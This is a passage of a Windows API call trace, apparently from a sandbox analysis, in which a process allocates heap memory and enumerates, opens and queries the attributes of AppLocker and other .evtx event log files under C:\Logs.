Flags=0x0, Size=0x14) returned 0x5cc20 [0085.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0085.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0085.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0085.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0085.927] AreFileApisANSI () returned 1 [0085.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpUsedDefaultChar=0x0) returned 80 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0085.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.927] AreFileApisANSI () returned 1 [0085.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 80 [0085.928] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.928] GetFileType (hFile=0x424) returned 0x1 [0085.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.928] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0085.928] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0085.928] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0085.928] CloseHandle (hObject=0x424) returned 1 [0085.929] AreFileApisANSI () returned 1 [0085.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0085.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 80 [0085.929] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.929] GetFileType (hFile=0x424) returned 0x1 [0085.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.929] CloseHandle (hObject=0x424) returned 1 [0085.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0085.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0085.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0085.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0085.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0085.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0085.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0085.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0085.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0085.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0085.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0086.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0086.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0086.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0086.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0086.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0086.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0086.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0086.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0086.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0086.021] AreFileApisANSI () returned 1 [0086.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0086.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 80 [0086.089] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0086.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0086.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.110] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0086.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0086.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0086.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0086.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0086.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0086.111] AreFileApisANSI () returned 1 [0086.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx", lpUsedDefaultChar=0x0) returned 54 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0086.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.112] AreFileApisANSI () returned 1 [0086.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0086.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75d50 [0086.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 54 [0086.112] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.112] GetFileType (hFile=0x424) returned 0x1 [0086.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.112] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.112] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.113] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.113] CloseHandle (hObject=0x424) returned 1 [0086.113] AreFileApisANSI () returned 1 [0086.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0086.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76110 [0086.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 54 [0086.113] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.113] GetFileType (hFile=0x424) returned 0x1 [0086.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.113] CloseHandle (hObject=0x424) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.114] AreFileApisANSI () returned 1 [0086.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75d50 [0086.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 54 [0086.114] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.114] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 